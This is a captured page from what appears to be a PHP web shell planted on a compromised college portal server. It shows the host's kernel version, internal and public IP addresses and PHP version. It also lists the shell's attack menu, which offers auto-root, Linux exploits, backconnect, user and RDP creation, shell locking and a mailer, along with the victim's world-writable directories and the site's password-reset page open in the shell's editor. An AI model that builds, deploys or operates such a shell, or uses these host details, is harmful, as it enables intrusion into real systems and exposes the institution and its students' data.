Linux ip-172-26-7-228 5.4.0-1103-aws #111~18.04.1-Ubuntu SMP Tue May 23 20:04:10 UTC 2023 x86_64
Apache
: 172.26.7.228 | : 18.190.253.224
Cant Read [ /etc/named.conf ]
5.6.40-24+ubuntu18.04.1+deb.sury.org+1
www-data
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
www /
oasis /
jssm /
[ HOME SHELL ]
Name
Size
Permission
Action
backup
[ DIR ]
drwxrwxrwx
halltickets
[ DIR ]
drwxrwsrwx
images
[ DIR ]
drwxrwsrwx
img
[ DIR ]
drwxrwsrwx
imported_files
[ DIR ]
drwxrwsrwx
student_photos
[ DIR ]
drwxrwsrwx
study_material
[ DIR ]
drwxrwsrwx
teacher_photos
[ DIR ]
drwxrwsrwx
tmpphotos
[ DIR ]
drwxrwsrwx
upload
[ DIR ]
drwxrwsrwx
MainPage.html
22
KB
-rwxr-xr-x
collegeInfoPopup.html
4.35
KB
-rwxr-xr-x
flash.html
2.23
KB
-rwxr-xr-x
forgotpassword.html
3.38
KB
-rwxr-xr-x
homepage.html
3.35
KB
-rwxr-xr-x
index.html
6.24
KB
-rwxr-xr-x
indexlogin.html
6.18
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : forgotpassword.html
<!DOCTYPE html> <html lang="en"> <head> <meta charset="utf-8"> <title></title> <meta name="description" content="Remodal example"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="stylesheet" href="../css/collinfo_popup.css"> </head> <body> <div class="remodal-bg"> <div class="remodal" data-remodal-id="modal"> <h2>Forgot Password</h2> <hr style='border:1px solid #16a085;' border-radius:25px;> <table style="margin-left:10px;text-align: left;" border="0" cellpadding="10" cellspacing="0"> <tr> <td valign="top" class="web_text_gray_bold">College Code </td> <td> : </td> <td valign="top" ><input style ="border-radius:4px;" name="collegecode" id="fcollegecode" placeholder=" College Code " value="" type="text" class="textfild_2" size="12" maxlength="4" "/> </td> </tr> <tr> <td valign="top" class="web_text_gray_bold">Mobile Number</td> <td> : </td> <td valign="top"><input style ="border-radius:4px;" name="mobnumb" maxlength="10" id="fmobnumb" placeholder=" Mobile Number " value="" type="text" class="textfild_2" size="15"/> <span class="remodal-confirm" style="padding: 2px 0px;width: 75px;">Send OTP</span> </td> </tr> <tr> <td valign="top" class="web_text_gray_bold">Enter OTP </td> <td> : </td> <td valign="top" ><input style ="border-radius:4px;" name="motp" id="fotp" placeholder=" OTP " value="" type="text" class="textfild_2" size="12" maxlength="6"/> </td> </tr> <tr> <td valign="top" class="web_text_gray_bold">New Password </td> <td> : </td> <td valign="top"><input style ="border-radius:4px;" name="Password1" maxlength="20" id="pwd" placeholder="Password" value="" type="password" class="textfild_2" size="15"/> <input type="checkbox" onclick="myFunction()">Show Password </td> </tr> <tr> <td valign="top" class="web_text_gray_bold">Confirm New Password </td> <td> : </td> <td valign="top"><input style ="border-radius:4px;" name="Password2" maxlength="20" id="cpwd" placeholder="Confirm Password" value="" type="password" class="textfild_2" size="15" border-radius: "25px"; /> </td> </tr> </table> <br> <span class="remodal-cancel" onclick='logout()'>Cancel</span> <span> <input class="remodal-confirm" onclick='validateotp()' type = "submit" value = "Submit"> </span> </div> <script>window.jQuery || document.write('<script src="../libs/jquery.min.js"><\/script>')</script> <script src="../js/collinfo_popup.js"></script> <script type="text/javascript" src ="../js/index.js" ></script> <script type="text/javascript" src="../js/MainPage.js"></script> <script type="text/javascript" src="../js/validate.js"></script> </body> </html>
Close